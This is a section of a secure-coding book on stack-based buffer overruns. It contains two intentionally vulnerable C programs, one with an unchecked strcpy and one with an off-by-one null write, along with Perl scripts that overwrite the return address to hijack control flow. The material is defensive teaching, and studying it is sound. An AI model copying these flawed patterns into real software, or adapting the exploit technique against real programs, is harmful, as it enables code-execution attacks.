Stack Overruns | Writing Secure Code, Second Edition

Stack Overruns

A stack-based buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the function's caller. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker. In a normal attack, attackers can get a program with a buffer overrun to do something they consider useful, such as binding a command shell to the port of their choice. The attacker often has to overcome some interesting problems, such as the fact that the user input isn't completely unchecked or that only a limited number of characters will fit in the buffer. If you're working with double-byte character sets, the hacker might have to work harder, but the problems this introduces aren't insurmountable.

If you're the type of programmer who enjoys arcane puzzles (the classic definition of a hacker), exploiting a buffer overrun can be an interesting exercise. (If you succeed, please keep it between yourself and the software vendor and behave responsibly with your information until the issue is resolved.) This particular intricacy is beyond the scope of this book, so I'll use a program written in C to show a simple exploit of an overrun. Let's take a look at the code:

    /*
      StackOverrun.c
      This program shows an example of how a stack-based
      buffer overrun can be used to execute arbitrary code. Its
      objective is to find an input string that executes the function bar.
    */

    #include <stdio.h>
    #include <string.h>

    void foo(const char* input)
    {
        char buf[10];

        //What? No extra arguments supplied to printf?
        //It's a cheap trick to view the stack 8-)
        //We'll see this trick again when we look at format strings.
        printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

        //Pass the user input straight to secure code public enemy #1.
        strcpy(buf, input);

        printf("%s\n", buf);

        printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
    }

    void bar(void)
    {
        printf("Augh! I've been hacked!\n");
    }

    int main(int argc, char* argv[])
    {
        //Blatant cheating to make life easier on myself
        printf("Address of foo = %p\n", foo);
        printf("Address of bar = %p\n", bar);

        if (argc != 2)
        {
            printf("Please supply a string as an argument!\n");
            return -1;
        }

        foo(argv[1]);
        return 0;
    }

This application is nearly as simple as Hello, World. I start off doing a little cheating and printing the addresses of my two functions, foo and bar, by using the printf function's %p option, which displays an address. If I were hacking a real application, I'd probably try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The real problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.

NOTE
Stack-based buffer overflows are often called static buffer overflows. Although static implies an actual static variable, which is allocated in global memory space, the word is used in this sense to be the opposite of a dynamically allocated buffer; that is, a buffer allocated with malloc on the heap. Although static is an overloaded term, it is common to see static buffer overflow used synonymously with stack-based buffer overflow.

The best way to follow along is to compile the application from the command line to produce a release executable. Don't just load it into Microsoft Visual C++ and run it in debug mode: the debug version contains checks for stack problems, and it won't demonstrate the problem properly. However, you can load the application into Visual C++ and run it in release mode. Let's take a look at some output after providing a string as the command-line argument:

    C:\Secureco2\Chapter05>StackOverrun.exe Hello
    Address of foo = 00401000
    Address of bar = 00401045
    My stack looks like:
    00000000
    00000000
    7FFDF000
    0012FF80
    0040108A <-- We want to overwrite the return address for foo.
    00410EDE

    Hello
    Now the stack looks like:
    6C6C6548 <-- You can see where "Hello" was copied in.
    0000006F
    7FFDF000
    0012FF80
    0040108A
    00410EDE

Now for the classic test for buffer overruns: we input a long string.

    C:\Secureco2\Chapter05>StackOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
    Address of foo = 00401000
    Address of bar = 00401045
    My stack looks like:
    00000000
    00000000
    7FFDF000
    0012FF80
    0040108A
    00410ECE

    AAAAAAAAAAAAAAAAAAAAAAAA
    Now the stack looks like:
    41414141
    41414141
    41414141
    41414141
    41414141
    41414141

And we get the application error message claiming the instruction at 0x41414141 tried to access memory at address 0x41414141, as shown in Figure 5-1.

Figure 5-1. Application error message generated after the stack-based buffer overrun occurs.

Note that if you don't have a development environment on your system, this information will be in the Dr. Watson logs. A quick look at the ASCII charts shows that the code for the letter A is 0x41. This result is proof that our application is exploitable. Warning! Just because you can't figure out a way to get this result does not mean that the overrun isn't exploitable. It means that you haven't worked on it long enough.

Is the Overrun Exploitable?

As we'll demonstrate shortly, there are many, many ways to cause an overflow to be exploitable. Except in a few trivial cases, it generally isn't possible to prove that a buffer overrun isn't exploitable. You can prove only that something is exploitable, so any given buffer overrun either is exploitable or might be exploitable. In other words, even if you can't prove that an overrun is exploitable, always assume that it is. If you tell the public that the buffer overrun in your application isn't exploitable, odds are someone will find a way to prove that it is exploitable just to embarrass you. Or worse, that person might find the exploit and inform only criminals. Now you've misled your users into thinking the patch to fix the overrun isn't a high priority, and there's an active nonpublic exploit being used to attack your customers.

I'd like to drill down on this point even further. I've seen many developers ask for proof that something is exploitable before they want to fix it. This is the WRONG approach! Just fix the bugs! This desire to determine whether the problem is really bad stems from solid software management practice, which says that for every few things a programmer fixes, they will cause some number of new bugs, depending on the complexity of the fix and the skill of the programmer. This may be true, but let's look at the difference between the consequences of an exploitable buffer overrun and an ordinary bug. The buffer overrun results in a security bulletin, public embarrassment, and if you're writing a popular server, can result in widespread network attacks due to worms. The ordinary bug results in a fix in the next service pack or maintenance release. Thus, we need to weigh the consequences. I'd assert that an exploitable buffer overrun is worse than 100 ordinary bugs.

Also, it could take days of developer time to determine whether something is exploitable. It probably takes less than an hour to fix the problem and get someone to review your changes. Fixes for buffer overflows are usually not risky changes. Even if you determine that you cannot find a way to exploit an overflow, you have little assurance that there truly is no way to exploit it. People also often ask how the vulnerable code could be reached. Determining all the possible code paths into a given function is difficult and is the subject of serious research. Except in trivial cases, you won't be able to rigorously determine whether you have examined all the possible ways to get into your function.

IMPORTANT
Don't fix only those bugs that you think are exploitable. Just fix the bugs!

Let's take a look at how we find which characters to feed the application. Try this:

    C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
    Address of foo = 00401000
    Address of bar = 00401045
    My stack looks like:
    00000000
    00000000
    7FFDF000
    0012FF80
    0040108A
    00410EBE

    ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
    Now the stack looks like:
    44434241
    48474645
    4C4B4A49
    504F4E4D
    54535251
    58575655

The application error message now shows that we're trying to execute instructions at 0x54535251. Glancing again at our ASCII charts, we see that 0x54 is the code for the letter T, so that's what we'd like to modify. Let's now try this:

    C:\Secureco2\Chapter05>StackOverrun.exe ABCDEFGHIJKLMNOPQRS
    Address of foo = 00401000
    Address of bar = 00401045
    My stack looks like:
    00000000
    00000000
    7FFDF000
    0012FF80
    0040108A
    00410ECE

    ABCDEFGHIJKLMNOPQRS
    Now the stack looks like:
    44434241
    48474645
    4C4B4A49
    504F4E4D
    00535251
    00410ECE

Now we're getting somewhere! By changing the user input, we're able to manipulate where the program tries to execute the next instruction. We're controlling the program flow with user input! Clearly, if we could send it 0x45, 0x10, 0x40 instead of QRS, we could get bar to execute. So how do you pass these odd characters (0x10 isn't printable) on the command line? Like any good hacker, I'll use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line:

    $arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
    $cmd = "StackOverrun ".$arg;
    system($cmd);

Running this script produces the desired result:

    C:\Secureco2\Chapter05>perl HackOverrun.pl
    Address of foo = 00401000
    Address of bar = 00401045
    My stack looks like:
    77FB80DB
    77F94E68
    7FFDF000
    0012FF80
    0040108A
    00410ECA

    ABCDEFGHIJKLMNOPE?@
    Now the stack looks like:
    44434241
    48474645
    4C4B4A49
    504F4E4D
    00401045
    00410ECA

    Augh! I've been hacked!

That was easy, wasn't it? Looks like something even a junior programmer could have done. In a real attack, we'd fill the first 16 characters with assembly code designed to do ghastly things to the victim and set the return address to the start of the buffer. Think about how easy this is to exploit the next time you're working with user input.

Note that if you're using a different compiler or are running a non-U.S. English version of the operating system, these offsets could be different. Several readers of the first edition wrote to point out that the samples didn't quite work because of this. It's one of the reasons I cheated and printed out the address of my two functions. The way to get the examples to work correctly is to follow along using the same technique as demonstrated above but to substitute the actual address of the bar function into your Perl script. Additionally, if you're compiling the application using Visual C++ .NET, the /GS compiler option will be set by default and will prevent this sample from working at all. (But then that's the whole point of the /GS flag!) Either take that flag out of the project settings, or compile from the command line.

Now let's take a look at an example of how an off-by-one error might be exploited. This sounds really difficult, but it turns out not to be hard at all if the conditions are right. Take a look at the following code:

    /*
      OffByOne.c
    */

    #include <stdio.h>
    #include <string.h>

    void foo(const char* in)
    {
        char buf[64];

        strncpy(buf, in, sizeof(buf));
        buf[sizeof(buf)] = '\0'; //whups - off by one!
        printf("%s\n", buf);
    }

    void bar(const char* in)
    {
        printf("Augh! I've been hacked!\n");
    }

    int main(int argc, char* argv[])
    {
        if(argc != 2)
        {
            printf("Usage is %s [string]\n", argv[0]);
            return -1;
        }

        printf("Address of foo is %p, address of bar is %p\n", foo, bar);
        foo(argv[1]);
        return 0;
    }

Our poor programmer gave this one a good shot: he used strncpy to copy the buffer, and sizeof was used to determine the size of the buffer. The only mistake is that the code writes one byte past the end of the buffer. The best way to follow along is to compile a release version with debugging information. Go into your project settings and under the C/C++ settings, set Debug Info to the same as your debug build would have and disable optimizations, which conflict with having debug information. If you're running Visual Studio .NET, turn off the /GS option and the /RTC option or this demo won't work. Next, go into the Link options and enable Debug Info there, too. Put a bunch of A's into your program arguments, set a breakpoint on the foo call, and let's take a look.

First, open your Registers window, and note the value of EBP; this is going to turn out to be very important. Now go ahead and step into foo. Pull up a Memory window, and find the location of buf. The strncpy call will fill buf with A's, and the next value below buf is your saved EBP pointer. Now step into the next line to terminate buf with a null character, and note how the saved EBP pointer has changed from 0x0012FF80 to 0x0012FF00 (on my system using Visual C++ 6.0; yours might be different). Next consider that you control what is stored at 0x0012FF00: it is currently filled with 0x41414141! Now step over the printf call, right-click on the program, and switch to disassembly mode. Open the Registers window, and watch carefully to see what happens. Just prior to the ret instruction, we see pop ebp. Now notice that the EBP register has our corrupted value. We now return into the main function, where we start to exit, and the last instruction we execute before returning from main is mov esp,ebp. We're just going to take the contents of the EBP register and store them in ESP, which is our stack pointer! Notice that once we step over the final ret instruction, we land right at 0x41414141. We've clearly seized control of the execution flow by using just one byte!

To make it exploitable, we can use the same technique as for a simple stack-based buffer overflow. We'll tinker with it until we get the execution errors to move around. As with the first example, a Perl script was the easiest way to make it work. Here's mine:

    $arg = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"."\x40\x10\x40";
    $cmd = "off_by_one ".$arg;
    system($cmd);

And here's the output:

    Address of foo is 00401000, address of bar is 00401040
    AAAAAAAAAAAAAAAAAAAAAAAAAAAA@?@
    Augh! I've been hacked!

There are a couple of conditions that need to be met for this to be exploited. First, the number of bytes in the buffer needs to be divisible by 4 or the single-byte overrun won't change the saved EBP. Next, we need to have control of the area that EBP now points to, so if the last byte of EBP were 0xF0 and our buffer were less than 240 bytes, we wouldn't be able to directly change the value that eventually gets moved into ESP. Nevertheless, a number of one-byte overruns have turned out to be exploitable in the real world. Two of the best known are the Apache mod_ssl off-by-one vulnerability and the wu-ftpd glob vulnerability. You can read about these at http://online.securityfocus.com/archive/1/279074 and ftp://ftp.wu-ftpd.org/pub/wu-ftpd-attic/cert.org/CA-2001-33, respectively.

NOTE
The 64-bit Intel Itanium does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It's just more difficult to make the overrun exploitable.